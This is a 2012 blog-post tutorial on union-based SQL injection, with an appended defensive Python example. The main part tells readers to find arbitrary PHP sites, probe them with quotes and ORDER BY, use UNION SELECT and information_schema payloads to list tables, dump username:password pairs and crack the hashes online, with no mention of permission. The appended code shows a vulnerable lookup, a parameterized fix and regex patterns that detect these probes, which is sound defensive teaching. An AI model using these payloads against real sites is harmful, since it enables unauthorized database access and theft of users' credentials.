Thursday, July 12, 2012

UNION-Based (Basic) SQL Injection

Today, I think you should learn UNION-Based (Basic) SQL Injection!

Here is what to do:

1) Find a site that uses PHP. The URL should end in something like php?id=... or ...php?p=... (etc.). Then type a ' (single quote) at the end (or before the last number).
ex. www.mysite.com/game.php?id=1'
If you get an error, you may proceed. (It means the site is vulnerable!)
2) Erase the single quote you typed before, and type order by 1-- at the end. The number shows the number of tables that the site's database has.
ex. .com/game.php?id=1 order by 1-- (It shouldn't give any error...)
3) Keep trying numbers (2, 4, 5, 7, etc.) until you get an error. The last number that doesn't give an error is the number of tables the database has!
ex. our site has 4 tables when:
id=1 order by 5-- (gets an error)
id=1 order by 4-- (doesn't get an error). So the number of tables the site's database has is 4!
4) This (in our example) will display which tables are vulnerable:
union all select 1,2,3,4--
ex. www.site.com/game?id=-1 union all select 1,2,3,4--
(You should see several numbers at different places on the page. These numbers are the numbers of the vulnerable tables.)
5) To find the SQL version, type @@version in place of the vulnerable table number that appears at the top of the page (ALWAYS THE ONE AT THE TOP).
union all select 1,2,@@version,4--
ex. id=-1 union all select 1,2,@@version,4-- (if the 3rd table is vulnerable and is the one at the top; if it is NOT the one shown above the other numbers, the attack will not succeed!)
You should see the site's MySQL version. It should be 5.x or higher. If it is lower than 5, other methods are needed to extract information.
6) To display the table names, type:
ex. union all select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
(Notice that the SQL command is inserted at the vulnerable table number we got from the "union all select" statement, in our example '4'.) Don't freak out if the commands are hard to learn at first! Take notes and you will pick them up after a while...
7) To display the column names, type:
ex. union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--

CHAR() is a MySQL function. The HackBar add-on for Firefox can convert a string (like 'users') into this format.
The numbers inside CHAR() are the converted form of the table name we need, in this example "users".

8) To display the columns we want (say "username" and "password") from a table (say "users"), type:
ex. union all select 1,2,group_concat(username,0x3a,password),4 from users--
username: column to display
password: column to display
0x3a: hex for the ':' character; makes the page show the data as user:pass
users: table to query

NOTE: The passwords are usually stored as MD5 (or SHA-1) hashes. Use a service to reverse them, like:
http://www.md5decrypter.co.uk/
That's it! This was Union-Based SQL Injection!
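To see why the steps above work and how to close the hole, here is an added example (not from the original post) that rebuilds the game.php?id= lookup in Python, with an in-memory SQLite table standing in for the site's MySQL database (so the MySQL-only @@version and information_schema parts are not reproduced): the string-concatenated query accepts the post's union all select payload, the parameterized version rejects it, and a small check flags the probes the post walks through in request query strings. Table name, columns and rows are constructed for the example.

```python
import re
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    """Constructed in-memory stand-in for the site's database (MySQL in the post, SQLite here)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE game (id INTEGER, title TEXT, genre TEXT, year INTEGER);
        INSERT INTO game VALUES (1, 'Chess', 'board', 1475);
    """)
    return conn


def lookup_vulnerable(conn, raw_id):
    """What game.php?id=... does when the parameter is pasted straight into the SQL text."""
    sql = "SELECT id, title, genre, year FROM game WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, raw_id):
    """Same lookup with the value bound as a parameter, after checking it really is an integer."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return []  # anything that is not a plain number never reaches the database
    sql = "SELECT id, title, genre, year FROM game WHERE id=?"
    return conn.execute(sql, (id_value,)).fetchall()


# Patterns for the probes the post describes: a stray quote after the id, ORDER BY n,
# UNION ... SELECT, and reads of information_schema. Matched on the decoded, lower-cased query string.
PROBE_PATTERNS = [
    re.compile(r"=\d+'"),
    re.compile(r"\border\s+by\s+\d+"),
    re.compile(r"\bunion\b.*\bselect\b"),
    re.compile(r"information_schema"),
]


def looks_like_union_probe(query_string):
    """Return True when a request's query string matches one of the injection probes above."""
    decoded = unquote_plus(query_string).lower()
    return any(p.search(decoded) for p in PROBE_PATTERNS)
```

The vulnerable lookup returns the injected row (1, 2, 3, 4) for the post's payload, while the safe lookup returns nothing for it and the expected game row for a plain id.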
